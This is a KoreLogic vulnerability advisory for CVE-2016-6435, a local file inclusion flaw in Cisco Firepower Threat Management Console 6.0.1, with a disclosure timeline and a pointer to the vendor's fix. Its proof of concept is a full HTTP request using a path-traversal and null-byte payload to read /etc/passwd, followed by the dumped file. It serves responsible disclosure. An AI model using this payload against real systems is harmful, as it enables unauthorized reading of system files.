Cisco Firepower Threat Management Console Local File Inclusion

ID KL-001-2016-006
Type korelogic
Reporter Matt Bergin (@thatguylevel)
Modified 2016-10-05T00:00:00


Title: Cisco Firepower Threat Management Console Local File Inclusion Advisory ID: KL-001-2016-006 Publication Date: 2016.10.05 Publication URL:

  1. Vulnerability Details

    Affected Vendor: Cisco Affected Product: Firepower Threat Management Console Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213) Platform: Embedded Linux CWE Classification: CWE-73: External Control of File Name or Path Impact: Information Disclosure Attack vector: HTTP CVE-ID: CVE-2016-6435

  2. Vulnerability Description

    An authenticated user can access arbitrary files on the local system.

  3. Technical Description

    Requests that take a file path do not properly filter what files can be requested. The webserver does not run as root, so files such as /etc/shadow are not readable.

    GET /events/reports/view.cgi?download=1&files=../../../etc/passwd%00 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Cookie: CGISESSID=2ee7e6f19a104f4453e201f26fdbd6f3 Connection: close

    HTTP/1.1 200 OK Date: Fri, 22 Apr 2016 23:58:41 GMT Server: Apache Content-Disposition: attachment; filename=passwd X-Frame-Options: SAMEORIGIN Connection: close Content-Type: application/octet-stream Content-Length: 623

    root:x:0:0:Operator:/root:/bin/sh bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin mysql:x:27:27:MySQL:/var/lib/mysql:/sbin/nologin nobody:x:99:99:nobody:/:/sbin/nologin sshd:x:33:33:sshd:/:/sbin/nologin www:x:67:67:HTTP server:/var/www:/sbin/nologin sfrna:x:88:88:SF RNA User:/Volume/home/sfrna:/sbin/nologin snorty:x:90:90:Snorty User:/Volume/home/snorty:/sbin/nologin sfsnort:x:95:95:SF Snort User:/Volume/home/sfsnort:/sbin/nologin sfremediation:x:103:103::/Volume/home/remediations:/sbin/nologin admin:x:100:100::/Volume/home/admin:/bin/sh casuser:x:101:104:CiscoUser:/var/opt/CSCOpx:/bin/bash

  4. Mitigation and Remediation Recommendation

    The vendor has issued a patch for this vulnerability in version 6.1. Vendor acknowledgement available at:

  5. Credit

    This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

  6. Disclosure Timeline

    2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco. 2016.06.30 - Cisco acknowledges receipt of vulnerability report. 2016.07.20 - KoreLogic and Cisco discuss remediation timeline for this vulnerability and for 3 others reported in the same product. 2016.08.12 - 30 business days have elapsed since the vulnerability was reported to Cisco. 2016.09.02 - 45 business days have elapsed since the vulnerability was reported to Cisco. 2016.09.09 - KoreLogic asks for an update on the status of the remediation efforts. 2016.09.15 - Cisco confirms remediation is underway and soon to be completed. 2016.09.28 - Cisco informs KoreLogic that the remediation details will be released publicly on 2016.10.05. 2016.10.05 - Public disclosure.

  7. Proof of Concept

    See Technical Description